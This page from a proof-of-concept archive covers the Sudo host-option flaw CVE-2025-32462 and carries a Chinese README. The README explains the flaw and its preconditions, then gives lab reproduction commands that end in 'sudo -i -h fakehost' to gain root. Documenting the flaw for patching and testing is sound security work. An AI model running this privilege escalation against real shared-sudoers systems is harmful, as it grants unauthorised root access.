Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1359 CNY

100%

CVE-2025-32462 PoC — Sudo 安全漏洞

Source
Associated Vulnerability
Title: Sudo 安全漏洞 (CVE-2025-32462)
Description:Sudo before 1.9.17p1, when used with a sudoers file that specifies a host that is neither the current host nor ALL, allows listed users to execute commands on unintended machines.
Description
cve-2025-32462' demo
Readme
# cve-2025-32462

![sudo_description](./image/Figure_1.png)

[sudo/NEWS at SUDO_1_8_8 · sudo-project/sudo · GitHub](https://github.com/sudo-project/sudo/blob/SUDO_1_8_8/NEWS)

sudo -h(--host)的文档里 写了-h 只与-l可以相连使用。后期更新的时候让sudo -h可以和-e,-i等一起使用

sudo --host(-h) \<username> -l(--list)

`/etc/sudoer.d`用于查看一个用户在系统中拥有什么权限。这个权限有可能被越过,让一个用户能够在某一系统的权限提升到另一个系统上可能拥有的权限。对于在多台计算机之间共享单个sudoers配置文件或使用基于网络的用户目录(如LDAP)来提供系统sudoers规则的系统尤其有影响。

总结来说:sudo的 `h/--host`  选项未遵循最小权限原则,在非`-l`场景(如命令执行)中未验证主机规则边界。攻击者可以在`/etc/sudoer.d`文件中配置恶意规则

### 影响

主要影响那些在多台机器上使用同一份 sudoers 文件的系统管理员的系统。

### 条件

漏洞攻击需要满足两个要求

- 攻击者获得一个已验证的用户

- 系统非默认配置,依赖于sudoers文件中存在的额外规则

例子:

sudoers文件包含定义该用户在不同系统上权限的规则。

Alice hostA: some Privilege

Bob hostB: some Privilege

Bob logs into hostA, then run command `sudo -h hostB commandA`

### 复现过程

```bash
git clone https://github.com/SpongeBob-369/cve-2025-32462.git
cd cve-2025-32462
chmod +x run.sh
./run.sh
# after entering the contain Ubuntu
sudo -l
# then prompt you to enter your password, but "we" don't know.
sudo -l -h fakehost    # Check the permissions user ubuntu have in host named  fakehost
sudo -i -h fakehost    # get root
```
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →